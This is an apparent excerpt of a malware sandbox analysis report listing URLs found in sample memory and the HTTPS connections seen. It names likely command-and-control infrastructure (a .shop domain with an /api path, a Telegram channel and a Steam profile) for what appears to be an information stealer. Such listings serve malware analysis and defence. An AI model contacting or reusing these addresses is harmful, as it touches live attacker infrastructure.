Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
Source: HIJJEG.12.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: explorer.exe, 00000002.00000000.1406666637.000000000BC80000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://java.co
Source: katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr String found in binary or memory: https://mozilla.org0/
Source: explorer.exe, 00000002.00000000.1406666637.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: explorer.exe, 00000002.00000000.1406666637.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comer
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199689717899[1].htm.12.dr String found in binary or memory: https://steamcommunity.com/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://steamcommunity.com/discussions/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?go
Source: 76561199689717899[1].htm.12.dr String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199689717899
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://steamcommunity.com/market/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/my/wish
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: EE6.exe, 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, EE6.exe, 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, EE6.exe, 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2532896243.0000000000422000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.000000000096E000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000983000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000972000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000983000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000983000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/badges
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/inventory/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000422000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899r0isMozilla/5.0
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199689717899[1].htm.12.dr String found in binary or memory: https://store.steampowered.com/
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: 76561199689717899[1].htm.12.dr String found in binary or memory: https://store.steampowered.com/about/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://store.steampowered.com/explore/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://store.steampowered.com/legal/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://store.steampowered.com/mobile
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://store.steampowered.com/news/
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://store.steampowered.com/points/shop/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://store.steampowered.com/stats/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: JKEBFB.12.dr String found in binary or memory: https://support.mozilla.org
Source: JKEBFB.12.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 5876.exe, 00000007.00000003.1774602744.0000000002D9B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: JKEBFB.12.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
Source: EE6.exe, 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, EE6.exe, 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, EE6.exe, 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2532896243.0000000000422000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/copterwin
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000422000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/copterwinr0isMozilla/5.0
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000002.2152415430.00000000007C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/
Source: 5876.exe, 00000007.00000003.1742482875.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1742584345.0000000000818000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/D
Source: 5876.exe, 00000007.00000002.2152415430.00000000007C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/H
Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1742584345.0000000000818000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/api
Source: 5876.exe, 00000007.00000003.1760169194.0000000000862000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1746306050.0000000000862000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/apiF
Source: 5876.exe, 00000007.00000002.2152415430.00000000007C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/n
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000002.00000000.1406666637.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/EM0
Source: explorer.exe, 00000002.00000000.1406666637.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.com48
Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, HIJJEG.12.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, HIJJEG.12.dr String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: JKEBFB.12.dr String found in binary or memory: https://www.mozilla.org
Source: JKEBFB.12.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: JKEBFB.12.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: JKEBFB.12.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: 5876.exe, 00000007.00000003.1774602744.0000000002D9B000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2398671914.000000001E434000.00000004.00000020.00020000.00000000.sdmp, JKEBFB.12.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: unknown Network traffic detected: HTTP traffic on port 53098 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53071 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53094 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53103 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53089
Source: unknown Network traffic detected: HTTP traffic on port 53107 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53094
Source: unknown Network traffic detected: HTTP traffic on port 53089 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53099
Source: unknown Network traffic detected: HTTP traffic on port 53100 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53098
Source: unknown Network traffic detected: HTTP traffic on port 53085 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53066 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53091 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53097
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53091
Source: unknown Network traffic detected: HTTP traffic on port 53112 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53074 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53099 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53110 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53102 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53106 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53066
Source: unknown Network traffic detected: HTTP traffic on port 53088 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53113 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53109
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53108
Source: unknown Network traffic detected: HTTP traffic on port 53111 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53077 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53103
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53102
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53068
Source: unknown Network traffic detected: HTTP traffic on port 53101 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53101
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53100
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53107
Source: unknown Network traffic detected: HTTP traffic on port 53105 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53106
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53105
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53104
Source: unknown Network traffic detected: HTTP traffic on port 53109 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53087 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53071
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53077
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53110
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53076
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53074
Source: unknown Network traffic detected: HTTP traffic on port 53114 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53108 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53097 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53076 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53068 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53114
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53113
Source: unknown Network traffic detected: HTTP traffic on port 53104 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53112
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53111
Source: unknown Network traffic detected: HTTP traffic on port 53086 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53082
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53088
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53087
Source: unknown Network traffic detected: HTTP traffic on port 53082 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53086
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53085
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53066 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53068 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53071 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53074 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53076 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53077 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53082 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.8:53085 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53086 version: TLS 1.2
